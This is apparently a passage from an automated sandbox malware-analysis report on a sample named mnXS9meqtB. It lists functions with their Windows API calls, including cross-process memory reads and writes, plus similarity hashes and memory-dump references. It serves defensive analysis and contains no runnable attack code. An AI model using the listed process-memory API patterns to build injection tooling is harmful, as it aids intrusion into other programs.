                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: 3ab5f9cfff99af20bab257495b9a0885a9cd5c11b9e4e67a470c502826e7b0bc
                                                                            • Instruction ID: 2462e2b9e5b98724e8be52bf882b4b831c5f604da1c10d0ccb91eee7418e890e
                                                                            • Opcode Fuzzy Hash: 3ab5f9cfff99af20bab257495b9a0885a9cd5c11b9e4e67a470c502826e7b0bc
                                                                            • Instruction Fuzzy Hash: E7012931D04619EBCF02AFE4DC49ADDBBB8FF08751F050595E502B6290DB30A65487A1
                                                                            Function 00339ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CLSIDFromProgID.OLE32 ref: 00339ADC
                                                                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00339AF7
                                                                            • lstrcmpiW.KERNEL32(?,00000000), ref: 00339B05
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00339B15
                                                                            • CLSIDFromString.OLE32(?,?), ref: 00339B21
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3897988419-0
                                                                            • Opcode ID: a315eec591b074e25332276a6c34938edd1dfb2fb13928aa539411543165399c
                                                                            • Instruction ID: e889515e510f98b45fcaf8d81caa9a4a94251ee9392ce5fe678ef9b11fa9e4fe
                                                                            • Opcode Fuzzy Hash: a315eec591b074e25332276a6c34938edd1dfb2fb13928aa539411543165399c
                                                                            • Instruction Fuzzy Hash: 0D01AD76600208FFDB124F68EC84BAABBFDEF44392F148066F906D6250D7B0DD009BA0
                                                                            Function 0033AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0033AA79
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0033AA83
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0033AA92
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0033AA99
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0033AAAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 7769c29bceb3ef939cd82cca3e143d0b39e3ac67db8844141da186d450cb2648
                                                                            • Instruction ID: 8d258b95b086fad7e2e9ac26980b8516d85491395861d0973b5e165ddba1e3ad
                                                                            • Opcode Fuzzy Hash: 7769c29bceb3ef939cd82cca3e143d0b39e3ac67db8844141da186d450cb2648
                                                                            • Instruction Fuzzy Hash: 4EF04976210304AFEB125FA4AC8DEAB3BACFF4A754F100469F981C71A0DB619C41CB61
                                                                            Function 0033AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0033AADA
                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0033AAE4
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0033AAF3
                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0033AAFA
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0033AB10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: c108b76e36cfe84493841ca9805c4a9b4bd27b07a50abb915fa338e1a6ad5bd5
                                                                            • Instruction ID: 940b509d5f6634c33f4787d18c03507c87da6ae801093e3fe02018a37686496e
                                                                            • Opcode Fuzzy Hash: c108b76e36cfe84493841ca9805c4a9b4bd27b07a50abb915fa338e1a6ad5bd5
                                                                            • Instruction Fuzzy Hash: EFF06275200308AFEB120FA4ECC8E677B6DFF45754F100169F942C7190DB619C01CB61
                                                                            Function 0033EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0033EC94
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0033ECAB
                                                                            • MessageBeep.USER32(00000000), ref: 0033ECC3
                                                                            • KillTimer.USER32(?,0000040A), ref: 0033ECDF
                                                                            • EndDialog.USER32(?,00000001), ref: 0033ECF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: e5de6b1281c1c9789c206d3a2b87f8a77bf5ebd14a566aab0a9e4edece2b0fd4
                                                                            • Instruction ID: 2ad65d5ff5bab2cabcb7ab2d5ac648216fc4f213076ec459ed261ace7f8641c6
                                                                            • Opcode Fuzzy Hash: e5de6b1281c1c9789c206d3a2b87f8a77bf5ebd14a566aab0a9e4edece2b0fd4
                                                                            • Instruction Fuzzy Hash: 72018130500714ABEB265B50DE9EB9A77BCFF00B05F001599F582B54E1DBF0AA45CB40
                                                                            Function 0031B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EndPath.GDI32(?), ref: 0031B0BA
                                                                            • StrokeAndFillPath.GDI32(?,?,0037E680,00000000,?,?,?), ref: 0031B0D6
                                                                            • SelectObject.GDI32(?,00000000), ref: 0031B0E9
                                                                            • DeleteObject.GDI32 ref: 0031B0FC
                                                                            • StrokePath.GDI32(?), ref: 0031B117
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: 1c199c7eb1309f52a7babceffa3598a6039ea2faaaac80721b7fe376a6cf44ff
                                                                            • Instruction ID: 334908ea83d266cd0430bb5645c333109baf00eef7d8bba0f2f98dc29c0f8bf3
                                                                            • Opcode Fuzzy Hash: 1c199c7eb1309f52a7babceffa3598a6039ea2faaaac80721b7fe376a6cf44ff
                                                                            • Instruction Fuzzy Hash: AAF01970000204EFCB27AF65EC0CB943B69AB06366F088354E865840F2C73099A5EF10
                                                                            Function 0034F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0034F2DA
                                                                            • CoCreateInstance.OLE32(0038DA7C,00000000,00000001,0038D8EC,?), ref: 0034F2F2
                                                                            • CoUninitialize.OLE32 ref: 0034F555
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                            • String ID: .lnk
                                                                            • API String ID: 948891078-24824748
                                                                            • Opcode ID: d39de298cb7bfc59df4ac9dc5837cede9d6ea3165609300112354534c919c4d8
                                                                            • Instruction ID: 73f6ad21a033d8d86b45dabb773f5d6305a93a97611918ec3f90208b860b5745
                                                                            • Opcode Fuzzy Hash: d39de298cb7bfc59df4ac9dc5837cede9d6ea3165609300112354534c919c4d8
                                                                            • Instruction Fuzzy Hash: 50A11AB1104201AFD306EF64CC91EABB7ECEF98714F00495DF5559B1A2EB70EA49CB92
                                                                            Function 0034E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0030660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003053B1,?,?,003061FF,?,00000000,00000001,00000000), ref: 0030662F
                                                                            • CoInitialize.OLE32(00000000), ref: 0034E85D
                                                                            • CoCreateInstance.OLE32(0038DA7C,00000000,00000001,0038D8EC,?), ref: 0034E876
                                                                            • CoUninitialize.OLE32 ref: 0034E893
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                            • String ID: .lnk
                                                                            • API String ID: 2126378814-24824748
                                                                            • Opcode ID: 483d3f6deb08b51cbf3760b9db6510f196d1d812ba49183d86c636283c15a41a
                                                                            • Instruction ID: 6c7eca27bf48f416b6e2c6345df9eca9ccb0a6184326f84250554d652f8959f4
                                                                            • Opcode Fuzzy Hash: 483d3f6deb08b51cbf3760b9db6510f196d1d812ba49183d86c636283c15a41a
                                                                            • Instruction Fuzzy Hash: 38A155356043019FCB16EF14C494E6ABBE5BF88710F058989F99A9B3A2CB31FD45CB91
                                                                            Function 0032325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 003232ED
                                                                              • Part of subcall function 0032E0D0: __87except.LIBCMT ref: 0032E10B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHandling__87except__start
                                                                            • String ID: pow
                                                                            • API String ID: 2905807303-2276729525
                                                                            • Opcode ID: c7de79fe857cdccc8d2c6fbabcfd6ef323dfb734381f19334fa0d11f286fea3e
                                                                            • Instruction ID: 9f8058b85970b240fcfeeb7def9e2969d68db4b4c715689709946980b63910f1
                                                                            • Opcode Fuzzy Hash: c7de79fe857cdccc8d2c6fbabcfd6ef323dfb734381f19334fa0d11f286fea3e
                                                                            • Instruction Fuzzy Hash: D3514931A08321D6CB17B714F94337A2B9CEB40710F258D69F4D6861A9DF3D9E989642
                                                                            Function 00344606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0039DC50,?,0000000F,0000000C,00000016,0039DC50,?), ref: 00344645
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003446C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper$__itow__swprintf
                                                                            • String ID: REMOVE$THIS
                                                                            • API String ID: 3797816924-776492005
                                                                            • Opcode ID: 913b5e49a3e750dbb65a9574271d7ad25b679e21b93fa2d411a033b4f7244d91
                                                                            • Instruction ID: a58b84a0a33e64bf2c3df865f8f9eed5f06d6c70e6ade7eec75c3225a8856e04
                                                                            • Opcode Fuzzy Hash: 913b5e49a3e750dbb65a9574271d7ad25b679e21b93fa2d411a033b4f7244d91
                                                                            • Instruction Fuzzy Hash: 0C417E74A002199FCF02DFA4C891BADBBF5FF49304F148069E956AF692DB34AD46CB50
                                                                            Function 0033C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0034430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0033BC08,?,?,00000034,00000800,?,00000034), ref: 00344335
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0033C1D3
                                                                              • Part of subcall function 003442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0033BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00344300
                                                                              • Part of subcall function 0034422F: GetWindowThreadProcessId.USER32(?,?), ref: 0034425A
                                                                              • Part of subcall function 0034422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0033BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0034426A
                                                                              • Part of subcall function 0034422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0033BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00344280
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0033C240
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0033C28D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: cad89fdda005a9ea041e5d6024db9ab6018a9748b0247c022165af6b78fa87a8
                                                                            • Instruction ID: de9f24035f55827e75cb3adb7b84daa7e4d85a5996b5e1e2f11373405f9f7b6a
                                                                            • Opcode Fuzzy Hash: cad89fdda005a9ea041e5d6024db9ab6018a9748b0247c022165af6b78fa87a8
                                                                            • Instruction Fuzzy Hash: AF41297690021CAFDB12DFA4CD81BEEB7B8BF09700F0045A5FA45BB181DA71AE45CB61
                                                                            Function 0036A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0039DC00,00000000,?,?,?,?), ref: 0036A6D8
                                                                            • GetWindowLongW.USER32 ref: 0036A6F5
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0036A705
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: 3120e6ce25efcceaa5959f7ffc7e0d05760e3ac566948cf4b4c72253f4c71303
                                                                            • Instruction ID: a17be715686448c73c668d2182425394ac932f56843e173ded10c7e71ea13c9d
                                                                            • Opcode Fuzzy Hash: 3120e6ce25efcceaa5959f7ffc7e0d05760e3ac566948cf4b4c72253f4c71303
                                                                            • Instruction Fuzzy Hash: A9319031200605ABDB128E74CC41BEA77A9EF49324F258715F875A31E5D770E8609B50
                                                                            Function 00355180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00355190
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003551C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset
                                                                            • String ID: |$D5
                                                                            • API String ID: 1413715105-3391885218
                                                                            • Opcode ID: 3e482c5b9594f2d49441c40668c8b97d25d4847607357695c60da2e6ff905b46
                                                                            • Instruction ID: 606a4c3996afd9450aac51a8a2867c770e5b0be040cd6e9c1ef568403dc7ca89
                                                                            • Opcode Fuzzy Hash: 3e482c5b9594f2d49441c40668c8b97d25d4847607357695c60da2e6ff905b46
                                                                            • Instruction Fuzzy Hash: FB311971811119ABCF02AFE4CD95EEE7FB9FF14700F000115F815AA166DB31AA06CBA0
                                                                            Function 0036A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0036A15E
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0036A172
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0036A196
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            • Opcode ID: 004af0a08b5d85a867215086d3eeebf3f53259f11af3b8791a82d7dd8ec38b90
                                                                            • Instruction ID: 8f7644ecf47cfdb8889a3914b5b5387b9763a35084d23f2eb5155df359e73a0c
                                                                            • Opcode Fuzzy Hash: 004af0a08b5d85a867215086d3eeebf3f53259f11af3b8791a82d7dd8ec38b90
                                                                            • Instruction Fuzzy Hash: 1121BF32510218ABDF128F94CC42FEA3B79EF49714F114214FE55BB1D0D6B5AC50CBA0
                                                                            Function 0036A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0036A941
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0036A94F
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0036A956
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: 44cb64b9d0f50a6e24a6aa7b8d6141f2edc5900e39b383da8993b2941e84dd29
                                                                            • Instruction ID: 299e10a5cff15ebd741bc96f2596f974df580f6903fe748f8907168efd87f005
                                                                            • Opcode Fuzzy Hash: 44cb64b9d0f50a6e24a6aa7b8d6141f2edc5900e39b383da8993b2941e84dd29
                                                                            • Instruction Fuzzy Hash: FC2192B5600609AFDB12DF18CC91DA737ADEF5A354F154059FA04AB3A2CB30EC119B61
                                                                            Function 003699A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00369A30
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00369A40
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00369A65
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
